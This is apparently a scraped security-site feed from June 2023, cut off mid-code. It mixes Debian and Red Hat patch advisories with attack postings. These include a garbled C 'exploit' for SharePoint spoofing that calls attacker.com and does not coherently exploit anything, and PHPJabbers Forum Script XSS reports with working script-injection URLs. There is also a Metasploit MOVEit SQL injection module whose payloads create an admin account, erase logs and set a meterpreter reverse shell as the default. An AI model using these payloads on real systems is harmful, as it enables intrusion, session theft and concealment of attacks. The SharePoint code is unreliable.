Microsoft SharePoint Enterprise Server 2016 suffers from a spoofing vulnerability.

    // Exploit Title: Microsoft SharePoint Enterprise Server 2016 - Spoofing// Date: 2023-06-20// country: Iran// Exploit Author: Amirhossein Bahramizadeh// Category : Remote// Vendor Homepage:// Microsoft SharePoint Foundation 2013 Service Pack 1// Microsoft SharePoint Server Subscription Edition// Microsoft SharePoint Enterprise Server 2013 Service Pack 1// Microsoft SharePoint Server 2019// Microsoft SharePoint Enterprise Server 2016// Tested on: Windows/Linux// CVE : CVE-2023-28288#include <windows.h>#include <stdio.h>// The vulnerable SharePoint server URLconst char *server_url = "http://example.com/";// The URL of the fake SharePoint serverconst char *fake_url = "http://attacker.com/";// The vulnerable SharePoint server file nameconst char *file_name = "vuln_file.aspx";// The fake SharePoint server file nameconst char *fake_file_name = "fake_file.aspx";int main(){    HANDLE file;    DWORD bytes_written;    char file_contents[1024];    // Create the fake file contents    sprintf(file_contents, "<html><head></head><body><p>This is a fake file.</p></body></html>");    // Write the fake file to disk    file = CreateFile(fake_file_name, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);    if (file == INVALID_HANDLE_VALUE)    {        printf("Error creating fake file: %d\n", GetLastError());        return 1;    }    if (!WriteFile(file, file_contents, strlen(file_contents), &bytes_written, NULL))    {        printf("Error writing fake file: %d\n", GetLastError());        CloseHandle(file);        return 1;    }    CloseHandle(file);    // Send a request to the vulnerable SharePoint server to download the file    sprintf(file_contents, "%s%s", server_url, file_name);    file = CreateFile(file_name, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);    if (file == INVALID_HANDLE_VALUE)    {        printf("Error creating vulnerable file: %d\n", GetLastError());        return 1;    }    if (!InternetReadFileUrl(file_contents, file))    {        printf("Error downloading vulnerable file: %d\n", GetLastError());        CloseHandle(file);        return 1;    }    CloseHandle(file);    // Replace the vulnerable file with the fake file    if (!DeleteFile(file_name))    {        printf("Error deleting vulnerable file: %d\n", GetLastError());        return 1;    }    if (!MoveFile(fake_file_name, file_name))    {        printf("Error replacing vulnerable file: %d\n", GetLastError());        return 1;    }    // Send a request to the vulnerable SharePoint server to trigger the vulnerability    sprintf(file_contents, "%s%s", server_url, file_name);    if (!InternetReadFileUrl(file_contents, NULL))    {        printf("Error triggering vulnerability: %d\n", GetLastError());        return 1;    }    // Print a message indicating that the vulnerability has been exploited    printf("Vulnerability exploited successfully.\n");    return 0;}BOOL InternetReadFileUrl(const char *url, HANDLE file){    HINTERNET internet, connection, request;    DWORD bytes_read;    char buffer[1024];    // Open an Internet connection    internet = InternetOpen("Mozilla/5.0 (Windows NT 10.0; Win64; x64)", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);    if (internet == NULL)    {        return FALSE;    }    // Connect to the server    connection = InternetConnect(internet, fake_url, INTERNET_DEFAULT_HTTP_PORT, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);    if (connection == NULL)    {        InternetCloseHandle(internet);        return FALSE;    }    // Send the HTTP request    request = HttpOpenRequest(connection, "GET", url, NULL, NULL, NULL, 0, 0);    if (request == NULL)    {        InternetCloseHandle(connection);        InternetCloseHandle(internet);        return FALSE;    }    if (!HttpSendRequest(request, NULL, 0, NULL, 0))    {        InternetCloseHandle(request);        InternetCloseHandle(connection);        InternetCloseHandle(internet);        return FALSE;    }    // Read the response data    while (InternetReadFile(request, buffer, sizeof(buffer), &bytes_read) && bytes_read > 0)    {        if (file != NULL)        {            // Write the data to disk            if (!WriteFile(file, buffer, bytes_read, &bytes_read, NULL))            {                InternetCloseHandle(request);                InternetCloseHandle(connection);                InternetCloseHandle(internet);                return FALSE;            }        }    }    InternetCloseHandle(request);    InternetCloseHandle(connection);    InternetCloseHandle(internet);    return TRUE;}

Microsoft SharePoint Enterprise Server 2016 Spoofing

Debian Linux Security Advisory 5438-1 - A flaw was found in Asterisk, an Open Source Private Branch Exchange. A buffer overflow vulnerability affects users that use PJSIP DNS resolver. This vulnerability is related to CVE-2022-24793. The difference is that this issue is in parsing the query record parse_query(), while the issue in CVE-2022-24793 is in parse_rr(). A workaround is to disable DNS resolution in PJSIP config (by setting nameserver_count to zero) or use an external resolver implementation instead.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5438-1                   security@debian.orghttps://www.debian.org/security/                          Markus KoschanyJune 22, 2023                         https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : asteriskCVE ID         : CVE-2023-27585Debian Bug     : 1036697A flaw was found in Asterisk, an Open Source Private Branch Exchange. Abuffer overflow vulnerability affects users that use PJSIP DNS resolver.This vulnerability is related to CVE-2022-24793. The difference is thatthis issue is in parsing the query record `parse_query()`, while the issuein CVE-2022-24793 is in `parse_rr()`. A workaround is to disable DNSresolution in PJSIP config (by setting `nameserver_count` to zero) or usean external resolver implementation instead.For the oldstable distribution (bullseye), this problem has been fixedin version 1:16.28.0~dfsg-0+deb11u3.We recommend that you upgrade your asterisk packages.For the detailed security status of asterisk please refer toits security tracker page at:https://security-tracker.debian.org/tracker/asteriskFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAmSUwnRfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFDRjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7UeRsCxAAuFfItEe6Gyu5VcJqSzHQpy+kfbBD1F6msFf7GnNzx4WiJssF5b4eVC4hIm6N4tW6S3YfoymUC4chFy9ifeH10HMruAlWik+h4v/TLEaeBps4UF6JmUkF8ra4ML3NT+vkdaLlFF7jtcDyTZXc0Vhy2wQ51EABX8bd7vUp39UObhZZw6+wJjrT6tCcP7wwMEOkoUCrg3llX/yvtpHqJiYo6yLrtEaoPpLvl2up6cx9FRvuK7E1B2hhPu0HoULxjphtz3Xmccw5kViC7zIo588GXCqIQW0/t6Uh0pYT1aWpWAfViMlpOtZx+PffpvFJy8Vizyp3MQ3yVZSOMrz68uOenXUkh9BbrdMw8AHbZgk/j8mKFbQhGJNfB2098BcmibGF3fPr0g6Ux6dGXlWUF1fMeuChmo5dylZhxmI4/M6wd5sqpHv4+RiEOM4XlROdlRQVToHIBGbwGvFAD7hiv6/wjmOXuY1NafqzCTyX1awMgKcQPqjPrUo1ugWyIQayIG2RhSKC/x8fUn1fr5+kA/KjvjH7pLtlvr2MWhOWV5ryUtuXdqGp5YWGZV5D2gA2sGeeGJgmAZfnzW6iY7/EZcLTnF1uWHGEk5cN/FQIObpqTqmSU2KOYWWmUOOVLAbko9P1aLCUNjj1WOzOMy29nbGBINnQquyW2DkhoaTYW6jjmPc==SDbp-----END PGP SIGNATURE-----

Debian Security Advisory 5438-1

Red Hat Security Advisory 2023-3614-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the container images for Red Hat OpenShift Container Platform 4.13.4.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: OpenShift Container Platform 4.13.4 bug fix and security update  
Advisory ID:       RHSA-2023:3614-01  
Product:           Red Hat OpenShift Enterprise  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3614  
Issue date:        2023-06-22  
CVE Names:         CVE-2022-4304 CVE-2022-4450 CVE-2022-41723   
                   CVE-2023-0215 CVE-2023-0361 CVE-2023-24329   
                   CVE-2023-24540   
=====================================================================

1. Summary:

Red Hat OpenShift Container Platform release 4.13.4 is now available with  
updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container  
Platform 4.13.

Red Hat Product Security has rated this update as having a security impact  
of [impact]. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing  
Kubernetes application platform solution designed for on-premise or private  
cloud deployments.

This advisory contains the container images for Red Hat OpenShift Container  
Platform 4.13.4. See the following advisory for the RPM packages for this  
release:

https://access.redhat.com/errata/RHSA-2023:3612

Space precludes documenting all of the container images in this advisory.  
See the following Release Notes documentation, which will be updated  
shortly for this release, for details about these changes:

https://docs.openshift.com/container-platform/4.13/release_notes/ocp-4-13-release-notes.html

Security Fix(es):

* net/http, golang.org/x/net/http2: avoid quadratic complexity in HPACK  
decoding (CVE-2022-41723)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

All OpenShift Container Platform 4.13 users are advised to upgrade to these  
updated packages and images when they are available in the appropriate  
release channel. To check for available updates, use the OpenShift CLI (oc)  
or web console. Instructions for upgrading a cluster are available at  
https://docs.openshift.com/container-platform/4.13/updating/updating-cluster-cli.html

3. Solution:

For OpenShift Container Platform 4.13 see the following documentation,  
which will be updated shortly for this release, for important instructions  
on how to upgrade your cluster and fully apply this asynchronous errata  
update:

https://docs.openshift.com/container-platform/4.13/release_notes/ocp-4-13-release-notes.html

You may download the oc tool and use it to inspect release image metadata  
for x86_64, s390x, ppc64le, and aarch64 architectures. The image digests  
may be found at  
https://quay.io/repository/openshift-release-dev/ocp-release?tab=tags.

      The sha values for the release are

      (For x86_64 architecture)  
The image digest is  
sha256:e3fb8ace9881ae5428ae7f0ac93a51e3daa71fa215b5299cd3209e134cadfc9c

      (For s390x architecture)  
The image digest is  
sha256:52f4c09586047c61465a24ceed2f5724024f5a5ef25da46e6078330f0dac08b2

      (For ppc64le architecture)  
The image digest is  
sha256:24763eafbee5a36c699bff8f4103bcfcd8fec9ef0c7fe30c0ab5c208bdab7044

      (For aarch64 architecture)  
The image digest is  
sha256:13b14f0514d24d241d40ebacac9f15f93acebc4a7849e4740df49e65e48af424

All OpenShift Container Platform 4.13 users are advised to upgrade to these  
updated packages and images when they are available in the appropriate  
release channel. To check for available updates, use the OpenShift CLI (oc)  
or web console. Instructions for upgrading a cluster are available at  
https://docs.openshift.com/container-platform/4.13/updating/updating-cluster-cli.html

4. Bugs fixed (https://bugzilla.redhat.com/):

2178358 - CVE-2022-41723 net/http, golang.org/x/net/http2: avoid quadratic complexity in HPACK decoding

5. JIRA issues fixed (https://issues.redhat.com/):

OCPBUGS-11116 - [RHOCP 4.13] MetalLB operator should be able to run other than default service account  
OCPBUGS-11768 - [4.13] RHCOS misses udev rules for GCE PD NVMe disks  
OCPBUGS-11824 - MetalLB operator doesnt show up when disconnected env is selected in operator hub  
OCPBUGS-13374 - [4.13] Forced BMH reboot fails when image URL has changed  
OCPBUGS-14024 - Master stuck in a creating/deleting loop when drop vmsize field from the CPMS providerSpec  
OCPBUGS-14298 - Upgrade to OCP 4.13.0 stuck due to machine-config error 'failed to run- nmstatectl: exit status 1'  
OCPBUGS-14357 - [4.13] configure-ovs blocks ssh access to the node when unhealthy  
OCPBUGS-14410 - It must be possible to append a piece of FRR configuration to what MetalLB renders  
OCPBUGS-14436 - Metric for control plane upgrade time   
OCPBUGS-14490 - HostedClusterConfigOperator doesn't check OperatorHub object in the Hosted Cluster  
OCPBUGS-14571 - Check permission and accessibility of non-default SCs on vSphere platform for CSI  
OCPBUGS-14589 - container_network* metrics stop reporting after container restart  
OCPBUGS-14620 - KCM is not aware of the AWS Region ap-southeast-3  
OCPBUGS-14635 - Maximum Number Of Egress IPs Supported  
OCPBUGS-14651 - disable debug pporf with unauthenticated port  
OCPBUGS-14672 - Should update with --include-local-oci-catalogs for --oci-registries-config options  
OCPBUGS-14801 - KCM is not aware of the AWS Region ap-southeast-3  
OCPBUGS-14830 - MetalLB has a bad CSV for 4.13.3.  Invalid service account  
OCPBUGS-14850 - Unable to do post-copy migration  
OCPBUGS-14860 - GCP XPN Private Cluster fails with no public zone  
OCPBUGS-14872 - Hypershift operator should honor 'hostedcluster.spec.configuration.ingress.loadBalancer.platform.aws.type'  
OCPBUGS-14895 - Do not fail creating cgroups  
OCPBUGS-14981 - place holder for log linking in 4.13.4  
OCPBUGS-8681 - [GWAPI] the gateway pod and service are still there after deleting gateway resource

6. References:

https://access.redhat.com/security/cve/CVE-2022-4304  
https://access.redhat.com/security/cve/CVE-2022-4450  
https://access.redhat.com/security/cve/CVE-2022-41723  
https://access.redhat.com/security/cve/CVE-2023-0215  
https://access.redhat.com/security/cve/CVE-2023-0361  
https://access.redhat.com/security/cve/CVE-2023-24329  
https://access.redhat.com/security/cve/CVE-2023-24540  
https://access.redhat.com/security/updates/classification/#moderate  
https://access.redhat.com/articles/11258

7. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZJVrjNzjgjWX9erEAQhIHhAAhCXJNMPx8UUsQ4Zff6rFht4F3T7JTNYA  
BXxVKEeeuD0lVGhCDoolyeEZpN3qePrNvBhbl0YjBCbz0114y3bqaKA9vljIkeRT  
5bzmyTlViCiwCoTy82kadUIi9+YvXoI3LEWmWEeOeGZFSpwM2OMpflJ591FJIwFt  
9szRX9TWkzF3DoGH/GOVv1h2oLHMNquBE3/5vhosLCZ5o65V7F+TWz8UbVsgfHPV  
imszrxicBgsrKsAhql1Owr4T5TXcwM0xRXDnaxnnipb3eecXjZDpPf/nIjgumEjw  
cyE2LPQ9wQZ5e5QGRi+FThWYDpN2hsc9s1ymAzYc1dU7N3veXtKOMOAXsl0e9ePL  
zH7SAnbWiqI3MzQSO1An28DSqN6vg3aSW8WW+z6ti7QJQRiHqb7JiO/Mb33OqbI7  
Bb2zoPy7WIJlrQCda3HfwzZfrhj70qQjqIx3Dtjx/12ZzPtI9bo4eSNBeW6Xkw/E  
c0iwkO412zsWaqLbvue90lrb+fSA6hMVjv7YtG/b2tFbXEigk9kA9OAmkNBA/n76  
l7Fd8GUX6sA0OUMOMCOhsrtfxz10BHopMMxEuFcQh3EZDMzsrVvNjqSr0Shxv4Xx  
wB4gh3SS5eWT6cKC8P29Ly0PTnpI0GJ74o3odFjbEV1lpqs6vynDtjW9SyUICPeE  
R6c9v/00vMo=  
=P9KS  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3614-01

PHPJabbers Forum Script version 3.0 suffers from a persistent cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://www.phpjabbers.com/php-forum-script/                               ││  Vendor   : PHPJabbers                                                                 ││  Software : PHPJabbers Forum Script 3.0                                                ││  Vuln Type: Stored XSS                                                                 ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  Allow Attacker to inject malicious code into website, give ability to steal sensitive ││  information, manipulate data, and launch additional attacks.                          ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘   Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘## Stored XSS-----------------------------------------------POST /1687474733_118/preview.php?controller=pjLoad&action=pjActionAsk HTTP/1.1ask_question=1&name=[XSS Payload]&email=cracker@infosec.com&question=[XSS Payload]&description=[XSS Payload]&category_id=3-----------------------------------------------POST parameter 'name' is vulnerable to XSSPOST parameter 'question' is vulnerable to XSSPOST parameter 'description' is vulnerable to XSS## Steps to Reproduce:1. Click on [+ New Question](as Guest)2. Inject your [XSS Payload] in "Full name"3. Inject your [XSS Payload] in "Question"4. Inject your [XSS Payload] in "Description"5. Select any [Category]6. Save (=Submit)5. When ADMIN Visit the [Questions] to Check [New Questions] on this Path (https://website/index.php?controller=pjAdminQuestions&action=pjActionIndex) in administration Panel6. XSS will Fire & Executed on his Browser7. Anyone visit your [Question Post] XSS will Fire & Executed on his Browser[-] Done

PHPJabbers Forum Script 3.0 Persistent Cross Site Scripting

PHPJabbers Forum Script version 3.0 suffers from a cross site scripting vulnerability.

┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
││                                     C r a C k E r                                    ┌┘  
┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││  
└───────────────────────────────────────────────────────────────────────────────────────┘┘

 ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘                                  [ Vulnerability ]                                   ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
:  Author   : CraCkEr                                                                    :  
│  Website  : https://www.phpjabbers.com/php-forum-script/                               │  
│  Vendor   : PHPJabbers                                                                 │  
│  Software : PHPJabbers Forum Script 3.0                                                │  
│  Vuln Type: Reflected XSS                                                              │  
│  Impact   : Manipulate the content of the site                                         │  
│                                                                                        │  
│────────────────────────────────────────────────────────────────────────────────────────│  
│                                                                                       ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
:                                                                                        :  
│  Release Notes:                                                                        │  
│  ═════════════                                                                         │  
│  The attacker can send to victim a link containing a malicious URL in an email or      │  
│  instant message can perform a wide variety of actions, such as stealing the victim's  │  
│  session token or login credentials                                                    │  
│                                                                                        │  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘                                                                                      ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Greets:

    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09  

         CryptoJob (Twitter) twitter.com/0x0CryptoJob

     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘                                    © CraCkEr 2023                                    ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Path: /preview.php

URL parameter is vulnerable to RXSS

https://website/preview.php/xmbfr"><script>alert(1)</script>bqptl?controller=pjLoad&action=pjActionIndex&category_id=1

Path: /preview.php

GET parameter 'action' is vulnerable to RXSS

https://website/preview.php?controller=pjLoad&action=pjActionIndexje35u%3cimg%20src%3da%20onerror%3dalert(1)%3eo5ycr&category_id=1

Path: /preview.php

GET parameter 'column' is vulnerable to RXSS

https://website/preview.php?controller=pjLoad&action=pjActionIndex&question_search=1&pjPage=1&column=created%00undzx%3cscript%3ealert(1)%3c%2fscript%3eqqfc9&direction=DESC&keyword=

Path: /preview.php

GET parameter 'direction' is vulnerable to RXSS

https://website/preview.php?controller=pjLoad&action=pjActionIndex&question_search=1&pjPage=1&column=created&direction=DESCm1al6%22%3e%3cscript%3ealert(1)%3c%2fscript%3evwg49&keyword=

Path: /preview.php

GET parameter 'keyword' is vulnerable to RXSS

https://website/preview.php?controller=pjLoad&action=pjActionIndex&question_search=1&pjPage=1&column=created&direction=DESC&keyword=v467i%22%3e%3cscript%3ealert(1)%3c%2fscript%3ek9pxe

[-] Done

PHPJabbers Forum Script 3.0 Cross Site Scripting

Red Hat Security Advisory 2023-3612-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the RPM packages for Red Hat OpenShift Container Platform 4.13.4. Issues addressed include a denial of service vulnerability.

Red Hat Security Advisory 2023-3612-01

Debian Linux Security Advisory 5435-2 - Several vulnerabilities were discovered in Apache Traffic Server, a reverse and forward proxy server, which could result in information disclosure or denial of service.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5435-2                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffJune 22, 2023                         https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : trafficserverCVE ID         : CVE-2022-47184 CVE-2023-30631 CVE-2023-33933Debian Bug     : 1038248Several vulnerabilities were discovered in Apache Traffic Server, areverse and forward proxy server, which could result in informationdisclosure or denial of service.For the stable distribution (bookworm), these problems have been fixed inversion 9.2.0+ds-2+deb12u1. This is a no change rebuild of the updatefrom DSA-5435-1 with a corrected version number.We recommend that you upgrade your trafficserver packages.For the detailed security status of trafficserver please refer toits security tracker page at:https://security-tracker.debian.org/tracker/trafficserverFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmSUjFIACgkQEMKTtsN8TjZ6Gw/8Ctomm+O4LFVSFL9LYqZs+9OzgKfPuufd4Py5Uv6v9U2pfAChExie8yRcalUMBU0oM4u4VMH47w/lLK0H5wAoZgBSnbv8IcT9MSAUQRCXkntDe96WQr+dPqqzCsEQ1NMy7KEEgql9RmgWZT7e9/X7PWDXQonlNRlKaQ50nsspQnF0StllXJpldfhcxbs5dhVdWbhgTQFTACM1li4vWg/yXs3GiwXle8gyCZCzk2rV/4F+LcBWghn0TkciCksG3Nk8LW5ySgkWBy6vhpLvVLxvc4yoJW2CJelcxZ0b/7VbiqVAy+i9sP1DtAWaEUUxcU2vRTBmyMYXNQBF4t2mLe7ZbqtbZjsxfhTApzGCSjNc/wCyAcTMDL1sHA5d2MduoF9afAJAuMEz1LHtdqNbZyqubx5GhNIlnvI20uUZAZtHPrzaL1JearET0JGgmkj+HQM8tw4s6B2eGeYgV7Enh+2nyVUrmuVtL36dOmrNKpENCLXGElGw0/aMUwLZO6bUARH4a9JcLK0FcFjwzeiJzQOk4SX3r0r1rnYhD2DWJzToVMkvj/MezDCnBTiEshrOqnJJhsU3o9gkNPFwbzh06oOUKbd7F4h8Hk6IuWJL+Shj+t2kopBW/9p0ToAQCh/caXXHKV9w5BtqJljRFlG+s71yHELqDAN5ZLfVOg/1TYtaTFE==URci-----END PGP SIGNATURE-----

Debian Security Advisory 5435-2

This Metasploit module exploits an SQL injection vulnerability in the MOVEit Transfer web application that allows an unauthenticated attacker to gain access to MOVEit Transfer's database. Depending on the database engine being used (MySQL, Microsoft SQL Server, or Azure SQL), an attacker can leverage an information leak be able to upload a .NET deserialization payload.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::Remote::HttpClient  def initialize(info = {})    super(      update_info(        info,        'Name' => 'MOVEit SQL Injection vulnerability',        'Description' => %q{          This module exploits an SQL injection vulnerability in the MOVEit Transfer web application          that allows an unauthenticated attacker to gain access to MOVEit Transfer’s database.          Depending on the database engine being used (MySQL, Microsoft SQL Server, or Azure SQL), an          attacker can leverage an information leak be able to upload a .NET deserialization payload.        },        'License' => MSF_LICENSE,        'Author' => [          'sfewer-r7', # PoC https://github.com/sfewer-r7/CVE-2023-34362          'rbowes-r7', # research          'bwatters-r7' # module        ],        'References' => [          ['CVE', '2023-34362' ],          ['URL', 'https://github.com/sfewer-r7/CVE-2023-34362'],          ['URL', 'https://attackerkb.com/topics/mXmV0YpC3W/cve-2023-34362/rapid7-analysis'],          ['URL', 'https://www.wiz.io/blog/cve-2023-34362']        ],        'Platform' => 'win',        'Arch' => [ARCH_CMD],        'Payload' => {          'Space' => 345        },        'Targets' => [          [            'Windows Command',            {              'DefaultOptions' => {                'PAYLOAD' => 'cmd/windows/http/x64/meterpreter/reverse_tcp',                'RPORT' => 443,                'SSL' => true              }            }          ],        ],        'DisclosureDate' => '2023-05-31',        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [ CRASH_SAFE ],          'Reliability' => [ REPEATABLE_SESSION ],          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ]        }      )    )    register_options(      [        Msf::OptString.new('TARGET_URI', [ false, 'Target URI', '/api/v1/token']),        Msf::OptString.new('USERNAME', [ true, 'Username', Rex::Text.rand_text_alphanumeric(5..11)]),        Msf::OptString.new('LOGIN_NAME', [ true, 'Login Name', Rex::Text.rand_text_alphanumeric(5..11)]),        Msf::OptString.new('PASSWORD', [ true, 'Password', Rex::Text.rand_text_alphanumeric(5..11)])      ]    )    @moveit_token = nil    @moveit_instid = nil    @guest_email_addr = "#{Rex::Text.rand_text_alphanumeric(5..12)}@#{Rex::Text.rand_text_alphanumeric(3..6)}.com"    @uploadfile_name = Rex::Text.rand_text_alphanumeric(8..15)    @uploadfile_size = rand(5..64)    @uploadfile_data = Rex::Text.rand_text_alphanumeric(@uploadfile_size)    @user_added = false    @files_json = nil  end  def begin_file_upload(folders_json, token_json)    boundary = rand_text_numeric(27)    post_data = "--#{boundary}\r\n"    post_data << "Content-Disposition: form-data; name=\"name\"\r\n\r\n#{@uploadfile_name}\r\n--#{boundary}\r\n"    post_data << "Content-Disposition: form-data; name=\"size\"\r\n\r\n#{@uploadfile_size}\r\n--#{boundary}\r\n"    post_data << "Content-Disposition: form-data; name=\"comments\"\r\n\r\n\r\n--#{boundary}--\r\n"    res = send_request_raw({      'method' => 'POST',      'uri' => normalize_uri("/api/v1/folders/#{folders_json['items'][0]['id']}/files?uploadType=resumable"),      'headers' => {        'Content-Type' => 'multipart/form-data; boundary=' + boundary,        'Authorization' => "Bearer #{token_json['access_token']}"      },      'connection' => 'close',      'accept' => '*/*',      'data' => post_data.to_s    })    fail_with(Msf::Exploit::Failure::Unknown, "Couldn't post API files #1 (#{files_response.body})") if res.nil? || res.code != 200    files_json = res.get_json_document    vprint_status("Initiated resumable file upload for fileId '#{files_json['fileId']}'...")    files_json  end  def check    res = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri('moveitisapi/moveitisapi.dll?action=capa'),      'connection' => 'close',      'accept' => '*/*'    })    version = nil    if res && res.code == 200 && res.headers.key?('X-MOVEitISAPI-Version')      version = Rex::Version.new(res.headers['X-MOVEitISAPI-Version'])      # 2020.1.x AKA 12.1.x      return Exploit::CheckCode::Appears if version >= Rex::Version.new('12.1.0') && version < Rex::Version.new('12.1.10')      # 2021.0.x AKA 13.0.x      return Exploit::CheckCode::Appears if version >= Rex::Version.new('13.0.0') && version < Rex::Version.new('13.0.8')      # 2021.1.x AKA 13.1.x      return Exploit::CheckCode::Appears if version >= Rex::Version.new('13.1.0') && version < Rex::Version.new('13.1.6')      # 2022.0.x AKA 14.0.x      return Exploit::CheckCode::Appears if version >= Rex::Version.new('14.0.0') && version < Rex::Version.new('14.0.6')      # 2022.1.x AKA 14.1.x      return Exploit::CheckCode::Appears if version >= Rex::Version.new('14.1.0') && version < Rex::Version.new('14.1.7')      # 2023.0.x AKA 15.0.x      return Exploit::CheckCode::Appears if version >= Rex::Version.new('15.0.0') && version < Rex::Version.new('15.0.3')    else      return Exploit::CheckCode::Safe    end    return Exploit::CheckCode::Unknown  end  def cleanup    cleanup_user(@files_json) if @user_added    super  end  def cleanup_user(files_json)    hax_username = datastore['USERNAME']    hax_loginname = datastore['LOGIN_NAME']    deleteuser_payload = [      "DELETE FROM moveittransfer.fileuploadinfo WHERE FileID='#{files_json['fileId']}'", # delete the deserialization payload      "DELETE FROM moveittransfer.files WHERE UploadUsername='#{hax_username}'", # delete the file we uploaded      "DELETE FROM moveittransfer.activesessions WHERE Username='#{hax_username}'", #      "DELETE FROM moveittransfer.users WHERE Username='#{hax_username}'", # delete the user account we created      "DELETE FROM moveittransfer.log WHERE Username='#{hax_username}'", # The web ASP stuff logs by username      "DELETE FROM moveittransfer.log WHERE Username='#{hax_loginname}'", # The API logs by loginname      "DELETE FROM moveittransfer.log WHERE Username='Guest:#{@guest_email_addr}'", # The SQLi generates a guest log entry.    ]    if @user_added      vprint_status("Deleting user #{hax_username}")      sqli(sqli_payload(deleteuser_payload))      @user_added = false    end  end  def create_sysadmin    hax_username = datastore['USERNAME']    hax_password = datastore['PASSWORD']    hax_loginname = datastore['LOGIN_NAME']    createuser_payload = [      "UPDATE moveittransfer.hostpermits SET Host='*.*.*.*' WHERE Host!='*.*.*.*'",      "INSERT INTO moveittransfer.users (Username) VALUES ('#{hax_username}')",      "UPDATE moveittransfer.users SET LoginName='#{hax_loginname}' WHERE Username='#{hax_username}'",      "UPDATE moveittransfer.users SET InstID='#{@moveit_instid}' WHERE Username='#{hax_username}'",      "UPDATE moveittransfer.users SET Password='#{makev1password(hax_password, Rex::Text.rand_text_alphanumeric(4))}' WHERE Username='#{hax_username}'",      "UPDATE moveittransfer.users SET Permission='40' WHERE Username='#{hax_username}'",      "UPDATE moveittransfer.users SET CreateStamp=NOW() WHERE Username='#{hax_username}'",    ]    res = sqli(sqli_payload(createuser_payload))    fail_with(Msf::Exploit::Failure::Unknown, "Couldn't perform initial SQLi (#{res.body})") if res.code != 200    @user_added = true  end  def 